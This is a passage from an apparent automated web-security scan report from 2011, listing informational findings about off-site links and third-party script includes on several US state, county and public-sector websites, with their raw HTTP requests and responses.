<li><a href="https://gw.tn.gov/">Groupwise</a>
...[SNIP]...

19.55. http://www.texas.gov/en/search/Pages/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.texas.gov
Path:   /en/search/Pages/results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en/search/Pages/results.aspx?q=Vehicle%20Registration HTTP/1.1
Host: www.texas.gov
Proxy-Connection: keep-alive
Referer: http://www.texas.gov/en/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AspxAutoDetectCookieSupport=1; __utmz=158357567.1304162070.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=158357567.1869902875.1304162070.1304162070.1304162070.1; __utmc=158357567; __utmv=158357567.%2FSilverlight%3D4; __utmb=158357567.3.9.1304162509925

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Fri, 15 Apr 2011 11:21:30 GMT
Last-Modified: Sat, 30 Apr 2011 11:21:30 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SPRequestGuid: 1d7fa50e-4d41-47c4-a029-e32ba3dacd2a
X-SharePointHealthScore: 0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 14.0.0.5123
Date: Sat, 30 Apr 2011 11:21:30 GMT
Content-Length: 51796


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="no-js" __expr-val-dir="ltr" dir="ltr">
<head><meta name="GENERATOR" content="Mic
...[SNIP]...
<h4>
                           <a href="http://www.txdmv.gov/vehicles/registration/register.htm">Register your <b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.txdmv.gov/vehicles/registration/register.htm">http://www.txdmv.gov/vehicles/registration/register.htm</a>
...[SNIP]...
<h4>
                           <a href="http://www.txdot.gov/">Texas Department of Transportation</a>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.txdot.gov/">http://www.txdot.gov/</a>
...[SNIP]...
<h4>
                           <a href="https://rts.texasonline.state.tx.us/NASApp/txdotrts/common/jsp/txdot_vtr_main_menu.jsp">Texas Department of Motor Vehicles - <b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="https://rts.texasonline.state.tx.us/NASApp/txdotrts/common/jsp/txdot_vtr_main_menu.jsp">https://rts.texasonline.state.tx.us/NASA...otrts/common/jsp/txdot_vtr_main_menu.jsp</a>
...[SNIP]...
<h4>
                           <a href="http://www.txdot.gov/drivers_vehicles/">Drivers &amp; Vehicles</a>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.txdot.gov/drivers_vehicles/">http://www.txdot.gov/drivers_vehicles/</a>
...[SNIP]...
<h4>
                           <a href="http://www.txdmv.gov/whatyouneed/forms/titles_registration.htm"><b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.txdmv.gov/whatyouneed/forms/titles_registration.htm">http://www.txdmv.gov/whatyouneed/forms/titles_registration.htm</a>
...[SNIP]...
<h4>
                           <a href="http://www.txdmv.gov/vehicles/drivers/new_residents.htm">New Residents</a>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.txdmv.gov/vehicles/drivers/new_residents.htm">http://www.txdmv.gov/vehicles/drivers/new_residents.htm</a>
...[SNIP]...
<h4>
                           <a href="http://www.co.collin.tx.us/tax_assessor/vehicles/vehicles.jsp">Collin County Tax Assessor and Collector: <b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.co.collin.tx.us/tax_assessor/vehicles/vehicles.jsp">http://www.co.collin.tx.us/tax_assessor/vehicles/vehicles.jsp</a>
...[SNIP]...
<h4>
                           <a href="http://www.txdmv.gov/vehicles/registration/faq.htm"><b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.txdmv.gov/vehicles/registration/faq.htm">http://www.txdmv.gov/vehicles/registration/faq.htm</a>
...[SNIP]...
<h4>
                           <a href="http://www.txdot.gov/about_us/administration/divisions/vtr.htm"><b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.txdot.gov/about_us/administration/divisions/vtr.htm">http://www.txdot.gov/about_us/administration/divisions/vtr.htm</a>
...[SNIP]...
<h4>
                           <a href="http://www.txdmv.gov/vehicles/registration/sticker.htm"><b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.txdmv.gov/vehicles/registration/sticker.htm">http://www.txdmv.gov/vehicles/registration/sticker.htm</a>
...[SNIP]...
<h4>
                           <a href="http://www.txdot.gov/redirect/default_dmv.htm">Register Your <b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.txdot.gov/redirect/default_dmv.htm">http://www.txdot.gov/redirect/default_dmv.htm</a>
...[SNIP]...
<h4>
                           <a href="http://www.co.collin.tx.us/tax_assessor/vehicles/new_resident.jsp">Collin County Tax Assessor and Collector: <b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.co.collin.tx.us/tax_assessor/vehicles/new_resident.jsp">http://www.co.collin.tx.us/tax_assessor/vehicles/new_resident.jsp</a>
...[SNIP]...
<h4>
                           <a href="http://www.bellcountytx.com/taxassessor/btxvehreg.htm">Tax Assessor Collector <b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.bellcountytx.com/taxassessor/btxvehreg.htm">http://www.bellcountytx.com/taxassessor/btxvehreg.htm</a>
...[SNIP]...
<h4>
                           <a href="http://www.murphytx.org/home/reg.asp">City of Murphy, Texas - <b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.murphytx.org/home/reg.asp">http://www.murphytx.org/home/reg.asp</a>
...[SNIP]...
<h4>
                           <a href="http://www.dot.state.tx.us/business/motor_carrier/overweight_permit/temporary.htm">Temporary <b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.dot.state.tx.us/business/motor_carrier/overweight_permit/temporary.htm">http://www.dot.state.tx.us/business/moto..._carrier/overweight_permit/temporary.htm</a>
...[SNIP]...
<h4>
                           <a href="https://rts.texasonline.state.tx.us/NASApp/txdotrts/RegistrationRenewalServlet?County=57&XXtask=2&language=eng">TxDMV - <b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="https://rts.texasonline.state.tx.us/NASApp/txdotrts/RegistrationRenewalServlet?County=57&XXtask=2&language=eng">https://rts.texasonline.state.tx.us/NASA...lServlet?County=57&amp;XXtask=2&amp;language=eng</a>
...[SNIP]...
<h4>
                           <a href="http://www.dot.state.tx.us/txdoteforms/GetForm?formName=/VTR-146.pdf&preference=PDFForm&appID=/vtr&fileID=1233334&status=/reportError.jsp&configFile=WFServletConfig.xml">Notice of Address Change for Texas <b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.dot.state.tx.us/txdoteforms/GetForm?formName=/VTR-146.pdf&preference=PDFForm&appID=/vtr&fileID=1233334&status=/reportError.jsp&configFile=WFServletConfig.xml">http://www.dot.state.tx.us/txdoteforms/G...Error.jsp&amp;configFile=WFServletConfig.xml</a>
...[SNIP]...
<h4>
                           <a href="http://www.dallascounty.org/department/tax/registration.html">Dallas County Tax Office - Dallas County Tax Assesor/Collector <b>
...[SNIP]...
<p class="TXGOV_SEARCH_URL"><a href="http://www.dallascounty.org/department/tax/registration.html">http://www.dallascounty.org/department/tax/registration.html</a>
...[SNIP]...
<li><a href='http://www.txdmv.gov'>Motor Vehicles, Dept. of</a>
...[SNIP]...
<li><a href='http://www.texasonline.state.tx.us/app/orig/index.jsp?AGENCY_NAME=bpe&CONFIG_ID=BPE_APR&LICENSE_ID=01'>Apprentice Plumber Initial Registration</a>
...[SNIP]...
<li><a href='http://www.texasonline.state.tx.us/app/orig/index.jsp?AGENCY_NAME=tdshs&CONFIG_ID=TDSHS_ALMI&LICENSE_ID=02'>Asbestos Worker..Registration </a>
...[SNIP]...
<li><a href='https://apps.tpwd.state.tx.us/bora/home.seam'>Boat Registration Renewal</a>
...[SNIP]...
<li><a href='http://www.window.state.tx.us/procurement/prog/cmbl/'>Centralized Master Bidders List Registration</a>
...[SNIP]...
<li><a href='http://www.texasonline.state.tx.us/NASApp/rap/apps/license/jsp/eng/welcome.jsp?agency=57&instance=tbce_facility'>Chiropractic Facility Registration</a>
...[SNIP]...
<li><a href='http://www.texasonline.state.tx.us/app/orig/index.jsp?AGENCY_NAME=tdshs&CONFIG_ID=TDSHS_SCE&LICENSE_ID=04'>Code Enforcement Officer in Training Registration </a>
...[SNIP]...
<li><a href='https://www.texasonline.state.tx.us/NASApp/rap/apps/license/jsp/eng/welcome.jsp?agency=55&instance=tdh_plc'>Code Enforcement Officer in Training Registration Renewal</a>
...[SNIP]...
<li><a href='http://www.texasonline.state.tx.us/app/orig/index.jsp?AGENCY_NAME=tdshs&CONFIG_ID=TDSHS_SCE&LICENSE_ID=03'>Code Enforcement Officer Registration </a>
...[SNIP]...
<li><a href='https://www.texasonline.state.tx.us/NASApp/rap/apps/license/jsp/eng/welcome.jsp?agency=55&instance=tdh_plc'>Code Enforcement Officer Registration Renewal</a>
...[SNIP]...
<li><a href='https://www.texasonline.state.tx.us/NASApp/rap/apps/license/jsp/eng/welcome.jsp?agency=70&instance=tsbde_lab'>Dental Lab Registration Renewal</a>
...[SNIP]...
<li><a href='http://rts.texasonline.state.tx.us/NASApp/txdotrts/common/jsp/txdot_vtr_main_menu.jsp?language=eng' title=' Renew Vehicle Registration'>
Renew Vehicle Registration</a>
...[SNIP]...
<li><a href='https://www.texasonline.state.tx.us/tolapp/txldrcdr/TXDPSLicenseeManager' title=' Order Driver Record'>
Order Driver Record</a>
...[SNIP]...
<li><a href='http://www.window.state.tx.us/webfile/' title=' Pay Sales Tax'>
Pay Sales Tax</a>
...[SNIP]...
<li><a href='http://www.flickr.com/groups/texasgov' title=' Photo Gallery'>
Photo Gallery</a>
...[SNIP]...
<li><a href='https://www.211texas.org/211/' title=' 2-1-1 Texas'>
2-1-1 Texas</a>
...[SNIP]...
<li><a class="TGOV_Footer_facebook" href="http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845?v=info" title="Visit us on Facebook">Facebook</a>
...[SNIP]...
<li><a class="TGOV_Footer_flickr" href="http://www.flickr.com/groups/texasgov" title="Visit us on Flickr">Flickr</a>
...[SNIP]...
<li><a class="TGOV_Footer_twitter" href="http://twitter.com/texasgov" title="Visit us on Twitter">Twitter</a>
...[SNIP]...
<li><a class="TGOV_Footer_youtube" href="http://www.youtube.com/user/TexasGov" title="Visit us on YouTube">YouTube</a>
...[SNIP]...
<li><a href="https://sao.fraud.state.tx.us/hotline.aspx"><acronym title="State Auditor's Office">
...[SNIP]...

19.56. http://www.vsea.org/purchase-vsea-clothing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /purchase-vsea-clothing

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /purchase-vsea-clothing?destination=node%2F723 HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/purchase-vsea-clothing
Cache-Control: max-age=0
Origin: http://www.vsea.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e
Content-Length: 46

name=&pass=&op=Log+in&form_id=user_login_block

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:14:02 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:14:02 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pur
...[SNIP]...
<li id="menu-340" class="menuparent inactive-menuparent menu-path-http:--vsea.prometheuslabor.com-node-316"><a href="http://vsea.prometheuslabor.com/node/316">Contracts</a>
...[SNIP]...
<li id="menu-531" class="child inactive-child"><a href="http://humanresources.vermont.gov/sites/dhr/files/pdf/labor_relations/DHR-Sick_Leave_Bank_App_Form_NonMan.pdf">NMU Sick Leave Bank Enrollment Form</a>
...[SNIP]...
<li id="menu-316" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157625862314208/">VSEA 2011 Legislative Open House</a>
...[SNIP]...
<li id="menu-565" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157625513935595/">VSEA Breakfast With Santa</a>
...[SNIP]...
<li id="menu-320" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157624777066935/">VSEA Marches In Northfield LD Parade</a>
...[SNIP]...
<li id="menu-488" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157622316025647/">VSEA Sept. 18 &quot;Accept The VSEA Offer&quot; Rally</a>
...[SNIP]...
<li id="menu-542" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157623301618128/">2010 VSEA Legislative Open House</a>
...[SNIP]...
<li id="menu-550" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157623755124174/">2010 Working Vermont Gubernatorial Debate </a>
...[SNIP]...
<li id="menu-481" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157622378755020/">Annual Meeting 2009</a>
...[SNIP]...
<li id="menu-441" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157613613028192/">&quot;Save Our State&quot; Rally At The State House</a>
...[SNIP]...
<li id="menu-437" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157613319698495/">February 2009 &quot;Vermont One&quot; Vigil To Stop The Cuts</a>
...[SNIP]...
<li id="menu-453" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157616090983517/">VSEA March 31 &quot;Stop The Cuts&quot; Rally</a>
...[SNIP]...
<li id="menu-451" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157615846102236/">VSEA Picket Brigade </a>
...[SNIP]...
<li id="menu-352" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157607436978667/">2008 VSEA Job Cuts Rally</a>
...[SNIP]...
<li id="menu-435" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157612863551094/">2009 VSEA Legislative Open House</a>
...[SNIP]...
<li id="menu-317" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157594303328177/"> Bennington Sick Building Action</a>
...[SNIP]...
<li id="menu-360" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157602786550565/">VSEA Annual Meeting 2007</a>
...[SNIP]...
<li id="menu-315" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157604163462190/">VSEA Speak Out 2008</a>
...[SNIP]...
<li id="menu-314" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157594498135219/"> 2007 VSEA Legislative Open House</a>
...[SNIP]...
<li id="menu-321" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157594173868156/"> 2006 VSEA Scholarship Winners</a>
...[SNIP]...
<li id="menu-318" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157594282795031/"> Annual Meeting 2006</a>
...[SNIP]...
<li id="menu-322" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157594170667613/"> Castleton State College 2006 Picnic</a>
...[SNIP]...
<li id="menu-319" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/sets/72157594271930586/"> Labor Day Parade 2006</a>
...[SNIP]...
<li id="menu-323" class="child inactive-child"><a href="http://www.flickr.com/photos/26873192@N00/127578454/"> Leadership Training</a>
...[SNIP]...
<li id="menu-442" class="child inactive-child"><a href="http://www.vseainsurance.com/">VSEA Member-Only Insurance Plan</a>
...[SNIP]...
<li id="menu-385" class="child inactive-child"><a href="http://www.vtstate.investeap.org/">EAP Website</a>
...[SNIP]...
<input border="0" alt="PayPal - The safer, easier way to pay online!" src="https://www.paypal.com/en_US/i/btn/btn_donateCC_LG.gif" type="image" name="submit" /> <img border="0" alt="" src="https://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="1" /></p>
...[SNIP]...
<p>
Click <a href="http://www.theunionshop.org/vsea/" class="Body">Here</a> To Go To Clothing Website<a href="http://www.theunionshop.org/vsea/" class="Body"><strong>
...[SNIP]...
<br />
        <a href="http://prometheuslabor.com">
           <img src="/sites/vsea.org/themes/unionproud2/ref-logo.gif" />
...[SNIP]...

20. Cross-domain script include  previous  next
There are 196 instances of this issue:


20.1. https://apps.tn.gov/bizreg/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.tn.gov
Path:   /bizreg/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bizreg/ HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxregister.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:20 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Accept-Ranges: bytes
ETag: W/"10163-1290013010000"
Last-Modified: Wed, 17 Nov 2010 16:56:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10163
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Tennessee Department of Revenue. Online Tax Registration.<
...[SNIP]...
<div id="entrust">
<script language="javascript" src="https://seal.entrust.net/seal.js?domain=apps.tn.gov&img=11"></script>
...[SNIP]...

20.2. https://apps.tn.gov/biztax/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.tn.gov
Path:   /biztax/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /biztax/ HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: https://www.tennesseeanytime.org/biztax/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:56 GMT
Server: Apache
Last-Modified: Sun, 24 Apr 2011 16:38:03 GMT
ETag: "1806d-12b9-4a1acb6f810c0"
Accept-Ranges: bytes
Content-Length: 4793
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!-- InstanceBegin templa
...[SNIP]...
<div id="entrust">
<script language="javascript" src="https://seal.entrust.net/seal.js?domain=apps.tn.gov&amp;img=11"></script>
...[SNIP]...

20.3. http://az.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://az.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: az.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 13606
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
ETag: "b60421-674d-1c493940"
Server: Apache/2.2.3 (Red Hat)
Date: Sat, 30 Apr 2011 07:27:41 GMT
Via: HTTP/1.1 aayslb2 (IBM-PROXY-WTE)
Last-Modified: Mon, 25 Apr 2011 22:55:57 GMT
Accept-Ranges: bytes
Content-Length: 26445
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Insta
...[SNIP]...
<div id="searchbar">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

20.4. http://az.gov/services_tourism.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://az.gov
Path:   /services_tourism.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /services_tourism.html HTTP/1.1
Host: az.gov
Proxy-Connection: keep-alive
Referer: http://az.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=70586944.1304162091.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=70586944.792197131.1304162091.1304162091.1304162091.1; __utmc=70586944; __utmb=70586944.1.10.1304162091; JSESSIONID=964884B254954F11A8A397B20587D9B1

Response

HTTP/1.1 200 OK
Age: 31387
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 17412
Accept-Ranges: bytes
ETag: "4f18f-4404-727a2ec0"
Last-Modified: Tue, 09 Nov 2010 20:18:43 GMT
Server: Apache/2.2.3 (Red Hat)
Date: Sat, 30 Apr 2011 02:40:59 GMT
Via: HTTP/1.1 aayslb2 (IBM-PROXY-WTE)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Insta
...[SNIP]...
<div id="searchbar">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

20.5. http://blog.nheconomy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.nheconomy.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: blog.nheconomy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:14 GMT
Server: Apache
X-Pingback: http://blog.nheconomy.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>
       <script type="text/javascript" charset="utf-8" src="http://w.sharethis.com/button/sharethis.js#publisher=33b5cc74-00f4-4c83-97fd-178d8c25cfce&amp;type=wordpress&amp;style=rotate&amp;wp=2.7"></script>
...[SNIP]...

20.6. http://cityofmuscleshoals.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cityofmuscleshoals.com
Path:   /Default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Default.asp HTTP/1.1
Host: cityofmuscleshoals.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:19:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
Content-Length: 12767
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQBRQBTR=FMMIMMOBDHDHEIKEOFLEMEMB; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base href="http://cityofmuscleshoals.com/Sites/Muscle_Shoals/" />
<title>Muscle Shoals, Alabama | Main-Homepage</title
...[SNIP]...
<!-- Begin eLocalLink Code :ml418vp5c-986 -->

<script language="JavaScript" src="http://elocallink.tv/mlink/mlink.php?x=BzhXbwRm"></script>
...[SNIP]...

20.7. http://climate.rutgers.edu/njwxnet/station.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://climate.rutgers.edu
Path:   /njwxnet/station.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /njwxnet/station.php HTTP/1.1
Host: climate.rutgers.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20252


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>Cream Ridge, NJ - Forecast, Radar and Current Weather - NJWxnet</title>
   <link rel="st
...[SNIP]...
</div>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.8. http://courts.delaware.gov/Help/fcrecordaccess.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://courts.delaware.gov
Path:   /Help/fcrecordaccess.stm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Help/fcrecordaccess.stm HTTP/1.1
Host: courts.delaware.gov
Proxy-Connection: keep-alive
Referer: http://courts.delaware.gov/Help/recordaccess.stm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:38:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 14246
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
